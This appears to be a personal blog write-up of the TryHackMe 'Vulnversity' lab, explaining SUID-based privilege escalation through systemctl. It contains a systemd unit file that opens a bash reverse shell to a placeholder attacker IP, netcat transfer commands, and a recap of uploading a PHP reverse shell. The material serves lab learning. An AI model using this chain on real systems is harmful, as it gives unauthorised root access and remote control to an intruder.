Lessons learned while escalating privileges on Vulnversity

After a long while, going through exams and other commitments I decided to play on TryHackMe. This time it was vulnversity room, I solved it and learned a lot of new stuff. Infosec is something where you get to learn new things every day (if you're involved in it). So I decided to mention a few things that I learned in this room for others to learn from it.

I think most of the room's content was easy, like nmap scan, directory brute-forcing, etc but the last section where we are asked to perform privilege escalation to get the root permissions and ultimately catch the flag was very interesting.

I will be talking about "Task 5: Privilege Escalation" here:

First of all, the concept of SUID is used here, now what is SUID?

I will try to explain it in the simplest of the words, SUID is a bit you can say a flag which is when true on a particular file, it gives that user to execute that file? Now, what's so special about it? This is temporary permission, that file usually isn't allowed to be executed by all the users but special permission is assigned to you to execute that file.

Now that solely depends upon, the nature of the file, that how priv esc can be carried out. We need to find out all the files that have SUID bit set. I did it using the following command:

find . -perm /4000

This will give us all the files that have their SUID bit set, we will use /bin/systemctl file here.

Systemctl is used to run services on Linux, and we can create our own service which will give us root access to the machine. Since we can execute /bin/systemctl with root permissions, every service ran through it will also be dealt with as if it was run by the root.

To create the service, I took help from this Github post I first created a file named "root.service", you can create it on your OS using any notepad like pluma, nano,vim etc.

Paste the following code in root.service file:

[Unit]

Description=roooooooooot

[Service]

Type=simple

User=root

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]

WantedBy=multi-user.target

KaliIP will obviously be replaced by your tun0 address of TryHackMe. Save the file and exit. 

As we don't have root privileges yet in the shell, so we have limited write access as well. We need to transfer this root.service file that we created in our OS to the vulnversity machine, for that we need write access. To find all the directories where you have the access to write, I used this command

find . -type d -maxdepth 3 -writable

You should've noticed by now that "find" can be very useful for Linux users if used properly. Here we'll get a list of directories where we can write anything. I chose /var/tmp.

Change the pwd to /var/tmp using cd, here we need to get that root.service file. For this purpose, we'll use netcat.

In the vulnversity machine, start listening through netcat using the following command

nc -lv 44444 -w 30 > root.service

I have used an additional -w flag here, the reason for that is -w will wait for an activity for max 30 seconds meaning that if netcat session has been inactive for 30 seconds continuously it will die itself. Why? Because If you're listening in vulnversity machine and after receiving the file you have to stop that netcat session for further exploitation. To stop that session, you might hit Ctrl + Z but it will eventually kill your main netcat session through which you got your reverse shell activated and you will need to ping that shell again to get connected to the machine again. -w worked for me and the session expired 30 seconds after receiving the file.

On your main OS where you made root.service file, send it to the vulnversity machine through following command:

nc -n TargetIP 44444 < root.service

TargetIP will be your vulnversity machine's IP (visible when you deploy the machine), the file will be sent to the target and the session will expire.

Now we have got the service file, and we know that we can use /bin/systemctl with root privs. Now activate the service file using the command

/bin/systemctl enable /var/tmp/root.service

Listen through netcat on your main OS before starting this service, because we'll get a root shell by starting this root.service

nc -lv 9999

We're listening on port 9999 because we specified it in our root.service file. Now run the following command in vulnversity machine and you'll get the root shell in the netcat session you just initiated

/bin/systemctl start root

Go and fetch the flag. We used systemctl to initiate our root.service, we only typed root because systemctl considers every input concatenated with .service e.g if you write "start tor" it will consider it as "tor.service" that's why we didn't write the full name.

Let's summarize this room,

1. If you find upload forms, brute force it using Burp Intruder to see what file extensions are allowed to be uploaded
2. In our case, it was .phtml we used the famous php-reverse-shell and copied it in our .phtml file and uploaded payload.phtml through the upload form
3. Now listen through netcat before firing the payload, hit IP:3333/internal/uploads/payload.phtml and you'll get the shell
4. Now look for SUID files, and use them to escalate your privileges that I already explained above.